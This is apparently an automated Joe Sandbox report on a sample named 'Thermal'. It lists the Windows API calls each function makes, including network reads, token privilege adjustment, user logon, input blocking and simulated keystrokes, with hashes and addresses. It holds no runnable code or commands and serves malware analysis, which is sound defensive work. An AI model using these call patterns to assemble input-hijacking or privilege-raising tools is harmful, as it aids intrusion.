                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: d47793a5e2eb70af742e076f4e4e6b1b0048bb8ee3308bff7dd63e234f15e457
                                                      • Instruction ID: 16f307b9cfd7a85518ceaaa11be2ca17acac4ef0614ca8333af1290807b34bfd
                                                      • Opcode Fuzzy Hash: d47793a5e2eb70af742e076f4e4e6b1b0048bb8ee3308bff7dd63e234f15e457
                                                      • Instruction Fuzzy Hash: 4611273A3049259FE7225F66DC84A2FBB9AFF59760F014229F846D7241DB30ED018AE0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: ac2b0b378f5d48dc487f1659cbb61ae634f62b46bb6a6d2a482cadaa7753ff8b
                                                      • Instruction ID: 8198e1030846a73b13f9eab7365885b526b2e1cd57d6ed3ef705831a258d370b
                                                      • Opcode Fuzzy Hash: ac2b0b378f5d48dc487f1659cbb61ae634f62b46bb6a6d2a482cadaa7753ff8b
                                                      • Instruction Fuzzy Hash: 85D01271808119EACB0E9A90CD45DFB737CAB0C344F120552F506A2040E73597A89B22
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00191ED6,00000000), ref: 00192AAD
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00192AE4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: cbae0bb4e63326d55861c6a160df74bef2b7c3d6407d10634ecaff083d59242f
                                                      • Instruction ID: 3774101ef844b8852bf8d0505efd18100adaeb2974793873e7e2853df9154e7b
                                                      • Opcode Fuzzy Hash: cbae0bb4e63326d55861c6a160df74bef2b7c3d6407d10634ecaff083d59242f
                                                      • Instruction Fuzzy Hash: 3541D572A00209BFEF20DE95CC85EBBB7FCEB40764F10405AF605A7551EB719E819660
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                      • GetLastError.KERNEL32 ref: 0017941D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 838c2f76316ad04b499c6a91c28444d04d48e04ef5d880b06bf7762232750028
                                                      • Instruction ID: b8544a41e2a376913a62f174d217123c7ed39f49e64c9beac077364a10fee6f4
                                                      • Opcode Fuzzy Hash: 838c2f76316ad04b499c6a91c28444d04d48e04ef5d880b06bf7762232750028
                                                      • Instruction Fuzzy Hash: 15116DB1414205AFD728EF64DCC5D2BB7B8FB48750B20852EF45A92650EB70AC45CA60
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00184271
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001842B2
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001842BD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 48f7f13fea1b4b64ace72c1fed66c250e14ce2bedd3fdbf8f7a2aa95032a36b9
                                                      • Instruction ID: 6d16b677da4ffe80e3cee08fb5de6550aa07019f3e642987925b3d1989b48a47
                                                      • Opcode Fuzzy Hash: 48f7f13fea1b4b64ace72c1fed66c250e14ce2bedd3fdbf8f7a2aa95032a36b9
                                                      • Instruction Fuzzy Hash: 3A118271E05228BFDB108F95AC44BAFBBBCEB49B60F104255FD04E7290C7704A008BA1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00184F45
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00184F5C
                                                      • FreeSid.ADVAPI32(?), ref: 00184F6C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 6be5dc058c0f88dac50d25b3a705f02574d4ed9e3d1f037fcabb6f27222625bc
                                                      • Instruction ID: 0a4073fe7e40e78dc4c886ff0683af54014d8e5ba4a83c9629d52a2264ea4f47
                                                      • Opcode Fuzzy Hash: 6be5dc058c0f88dac50d25b3a705f02574d4ed9e3d1f037fcabb6f27222625bc
                                                      • Instruction Fuzzy Hash: 6BF04975A1130DBFDF00EFE4DC89AAEBBBCEF08201F1045A9BA01E2580E7356A448B50
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00181B01
                                                      • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00181B14
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 9bdbc63889587b0f7d319319f787392e413d8bcce192ddcf54ff6fa5f1aabe94
                                                      • Instruction ID: da35278d82a3cfa59612ab9af3a6b148e7a00efe957bda0f1bdcf5c76e1ab384
                                                      • Opcode Fuzzy Hash: 9bdbc63889587b0f7d319319f787392e413d8bcce192ddcf54ff6fa5f1aabe94
                                                      • Instruction Fuzzy Hash: 93F0497290020DABDB15DF94C805BFE7BB8FF08315F00814AF95596292D3799A16DF94
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00199B52,?,001B098C,?), ref: 0018A6DA
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00199B52,?,001B098C,?), ref: 0018A6EC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: c95b839561f2d5bab6863bb3c87ce338c86a3522deedc1ae8fd22f4b7d7ddeb5
                                                      • Instruction ID: ce1d1bba34c4e30254fc0c85413da03a0344d3523b8b6d9f7baf5baa8bd571dd
                                                      • Opcode Fuzzy Hash: c95b839561f2d5bab6863bb3c87ce338c86a3522deedc1ae8fd22f4b7d7ddeb5
                                                      • Instruction Fuzzy Hash: 2FF0893550421DBBDB21AFA4CC48FDA776CBF09351F004256B91896151D7709654CFA1
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00178F27), ref: 00178DFE
                                                      • CloseHandle.KERNEL32(?,?,00178F27), ref: 00178E10
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 19eea5f6720fab36e1c486d3f67bac38cfaad09d1e2b3111950925f63c1f0c36
                                                      • Instruction ID: 25ef7b689a817c8358ec75f4c7acdf7d6cae57d09fe6b99e0210316e5fda75be
                                                      • Opcode Fuzzy Hash: 19eea5f6720fab36e1c486d3f67bac38cfaad09d1e2b3111950925f63c1f0c36
                                                      • Instruction Fuzzy Hash: EBE0B676010610EFE7266B60EC09E777BEDEB08350B248929F49A81870DB62ACD0DB50
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00148F87,?,?,?,00000001), ref: 0014A38A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0014A393
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: c8674b741130da7388e0e67daf3dc41a2a20e6e639363d1355c4e37afcc0dac6
                                                      • Instruction ID: b83cd3b4d3f0724aaf3dea91362ea340f177612330c21a5846d83e5195e489a1
                                                      • Opcode Fuzzy Hash: c8674b741130da7388e0e67daf3dc41a2a20e6e639363d1355c4e37afcc0dac6
                                                      • Instruction Fuzzy Hash: 99B09231064208AFCA422B91EC0DB8A3FA8FB48AA2F004110F60E44870CB6254908A91
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 001945F0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: ef4d86023d34fa572ddbd2463acc263a678f304a2c1da7cab17e2c5f897ea05d
                                                      • Instruction ID: 2ba63ed16c3c58b0d08e43328a69a00147674eb45e180305eaa823ff4d0d147b
                                                      • Opcode Fuzzy Hash: ef4d86023d34fa572ddbd2463acc263a678f304a2c1da7cab17e2c5f897ea05d
                                                      • Instruction Fuzzy Hash: F9E0DF31200219AFD710AFA9E800E8BF7E8AFA87A0F01C016FC09C7310DB70F8418B90
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00185205
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 741bd12cbcd46ee7399936faf96be3b668c63c9d6ef5d879d6b69169c936610d
                                                      • Instruction ID: 566311cef8abf992d5f0a6e99bec9ca46cc06f5262a5faa0e7bc92831dd30388
                                                      • Opcode Fuzzy Hash: 741bd12cbcd46ee7399936faf96be3b668c63c9d6ef5d879d6b69169c936610d
                                                      • Instruction Fuzzy Hash: 63D052A4260E0A38EF2823248E0FF76020BE3217C0F8442897002894C2EFD06A85AE31
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00178FA7), ref: 00179389
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 9ca27dc81d270b6108d5f1245ad3507c77fac7d255615353cdeec4b69ddc14e0
                                                      • Instruction ID: 0411e140ae80c78d40630055e31defad9dd08fb4eb8ae1a2b00fc1e81670aad1
                                                      • Opcode Fuzzy Hash: 9ca27dc81d270b6108d5f1245ad3507c77fac7d255615353cdeec4b69ddc14e0
                                                      • Instruction Fuzzy Hash: 3BD05E3226050EABEF019EA4DC02EAF3B69EB04B01F408111FE15C50A0C776D835AB60
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00160734
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: 1a59af56b0721f35c1394a0c5f61541e38631e1fb77313e1abd2c639cf0a8f7b
                                                      • Instruction ID: 4d1b44d9bc7a127c65d21f43d3237d640f27a8ffcd7b629cef07f98c1301dbaa
                                                      • Opcode Fuzzy Hash: 1a59af56b0721f35c1394a0c5f61541e38631e1fb77313e1abd2c639cf0a8f7b
                                                      • Instruction Fuzzy Hash: 85C04CF1800109DBCB06DBA0D988EEF77BCAB08344F100155B105B2100D7749B448A71
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0014A35A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 33a727ee03829a5479265f4da2eb81c21b2c84edebf90fb66f8e8439dec3b29d
                                                      • Instruction ID: 383ae6042fc51485d207ea3a38e74758940f679da6d97780f8e363b7f78c7eea
                                                      • Opcode Fuzzy Hash: 33a727ee03829a5479265f4da2eb81c21b2c84edebf90fb66f8e8439dec3b29d
                                                      • Instruction Fuzzy Hash: 0FA0123001010CAB8A011B41EC084457F9CE7041907004010F40D00431873254504580
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,001B0980), ref: 001A3C65
                                                      • IsWindowVisible.USER32(?), ref: 001A3C89
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: b196b9c2f03f621c560378af7dd0d23664264ef3deea618f5fcc501a25302e2f
                                                      • Instruction ID: 32f0d792038b608389912be3ba41a79901a05464ea6be4062602905930afbde5
                                                      • Opcode Fuzzy Hash: b196b9c2f03f621c560378af7dd0d23664264ef3deea618f5fcc501a25302e2f
                                                      • Instruction Fuzzy Hash: 09D18134204215DBCB05EF50C951FAEB7B1AFA5354F108859F9566B3B2CB31EE4ACB82
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 001AAC55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 001AAC86
                                                      • GetSysColor.USER32(0000000F), ref: 001AAC92
                                                      • SetBkColor.GDI32(?,000000FF), ref: 001AACAC
                                                      • SelectObject.GDI32(?,?), ref: 001AACBB
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001AACE6
                                                      • GetSysColor.USER32(00000010), ref: 001AACEE
                                                      • CreateSolidBrush.GDI32(00000000), ref: 001AACF5
                                                      • FrameRect.USER32(?,?,00000000), ref: 001AAD04
                                                      • DeleteObject.GDI32(00000000), ref: 001AAD0B
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 001AAD56
                                                      • FillRect.USER32(?,?,?), ref: 001AAD88
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001AADB3
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(00000012), ref: 001AAF51
                                                        • Part of subcall function 001AAF18: SetTextColor.GDI32(?,?), ref: 001AAF55
                                                        • Part of subcall function 001AAF18: GetSysColorBrush.USER32(0000000F), ref: 001AAF6B
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(0000000F), ref: 001AAF76
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(00000011), ref: 001AAF93
                                                        • Part of subcall function 001AAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001AAFA1
                                                        • Part of subcall function 001AAF18: SelectObject.GDI32(?,00000000), ref: 001AAFB2
                                                        • Part of subcall function 001AAF18: SetBkColor.GDI32(?,00000000), ref: 001AAFBB
                                                        • Part of subcall function 001AAF18: SelectObject.GDI32(?,?), ref: 001AAFC8
                                                        • Part of subcall function 001AAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 001AAFE7
                                                        • Part of subcall function 001AAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001AAFFE
                                                        • Part of subcall function 001AAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 001AB013
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 96eb4f02da61e8cc01459db7ac0b3299bc0c5b2f69142ff39f65f6f477133c9c
                                                      • Instruction ID: 1259ac364f48421c76e787a167de044e4ef1fadc022612bf0df8a8bcaa4e99ca
                                                      • Opcode Fuzzy Hash: 96eb4f02da61e8cc01459db7ac0b3299bc0c5b2f69142ff39f65f6f477133c9c
